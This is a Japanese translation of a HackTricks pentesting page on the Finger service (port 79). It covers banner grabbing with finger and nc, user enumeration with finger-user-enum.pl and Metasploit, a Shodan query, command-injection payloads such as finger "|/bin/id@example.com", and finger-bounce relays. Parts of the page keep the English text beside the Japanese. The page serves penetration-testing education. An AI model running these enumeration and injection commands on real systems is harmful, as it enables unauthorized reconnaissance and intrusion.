79 - ペントエスティング Finger

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

サイバーセキュリティ会社で働いていますか？ HackTricksで会社を宣伝したいですか？または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
公式のPEASS＆HackTricksのグッズを手に入れましょう。
💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
**ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリ**にPRを提出してください。

基本情報

Fingerは、コンピュータユーザーに関する情報を見つけるために使用できるプログラムです。通常、ログイン名、フルネーム、およびユーザーに関するその他の詳細（オフィスの場所や電話番号など）が表示されます。これらの詳細には、ログイン時間、アイドル時間、メールの最終読み取り時間、ユーザーのプランとプロジェクトファイルも含まれる場合があります。

デフォルトポート： 79

PORT   STATE SERVICE
79/tcp open  finger

列挙

バナーグラビング/基本的な接続

バナーグラビングは、ネットワークサービスの列挙に使用される一般的なテクニックです。これにより、サービスが提供しているバージョンや情報を取得することができます。Fingerプロトコルは、バナーグラビングの一つの方法です。

Fingerプロトコルは、リモートホストのユーザー情報を取得するために使用されます。通常、ポート番号79で実行されます。以下のコマンドを使用して、Fingerプロトコルを使用してリモートホストに接続し、ユーザー情報を取得できます。

finger @<target_ip>

または

finger <username>@<target_ip>

このコマンドを実行すると、リモートホストからユーザー情報が表示されます。この情報は、攻撃者がターゲットシステムに関する有用な情報を収集するのに役立ちます。

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

ユーザーの列挙

User enumeration is the process of gathering information about valid user accounts on a target system. This information can be used to launch further attacks, such as brute-forcing passwords or attempting to gain unauthorized access.

ユーザーの列挙とは、対象システム上の有効なユーザーアカウントに関する情報を収集するプロセスです。この情報は、パスワードの総当たり攻撃や不正アクセスの試みなど、さらなる攻撃を行うために使用されることがあります。

There are several techniques that can be used to perform user enumeration, including:

ユーザーの列挙を行うために使用できるいくつかの技術があります。これには以下のものがあります。

Finger service: The Finger service is a network protocol that allows users to retrieve information about other users on a remote system. By querying the Finger service, an attacker can obtain a list of valid user accounts.
Fingerサービス: Fingerサービスは、ユーザーがリモートシステム上の他のユーザーに関する情報を取得するためのネットワークプロトコルです。Fingerサービスにクエリを送信することで、攻撃者は有効なユーザーアカウントのリストを取得することができます。
Username guessing: This technique involves guessing common usernames or using a list of known usernames to determine if they are valid on the target system.
ユーザー名の推測: この技術は、一般的なユーザー名を推測したり、既知のユーザー名のリストを使用して、それらが対象システムで有効かどうかを判断することを含みます。
User enumeration via error messages: Some systems may provide different error messages when an invalid username is entered compared to when a valid username is entered. By analyzing these error messages, an attacker can determine if a username is valid or not.
エラーメッセージを利用したユーザーの列挙: 一部のシステムでは、無効なユーザー名が入力された場合と有効なユーザー名が入力された場合で異なるエラーメッセージが表示される場合があります。これらのエラーメッセージを分析することで、攻撃者はユーザー名が有効かどうかを判断することができます。
User enumeration via timing attacks: In some cases, the response time of a system may vary depending on whether a valid or invalid username is entered. By measuring the response time, an attacker can determine if a username is valid or not.
タイミング攻撃を利用したユーザーの列挙: 一部の場合、システムの応答時間は有効なユーザー名か無効なユーザー名かによって異なる場合があります。応答時間を測定することで、攻撃者はユーザー名が有効かどうかを判断することができます。

It is important to note that user enumeration can be a precursor to more advanced attacks, so it is crucial to address any vulnerabilities discovered during this process.

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

代わりに、pentestmonkeyからfinger-user-enumを使用することもできます。いくつかの例は以下の通りです：

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmapはデフォルトのスクリプトを使用して実行する

MetasploitはNmapよりも多くのトリックを使用します

use auxiliary/scanner/finger/finger_users

Shodan

port:79 USER

コマンドの実行

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

システムをフィンガーリレーとして使用する

finger user@host@victim
finger @internal@external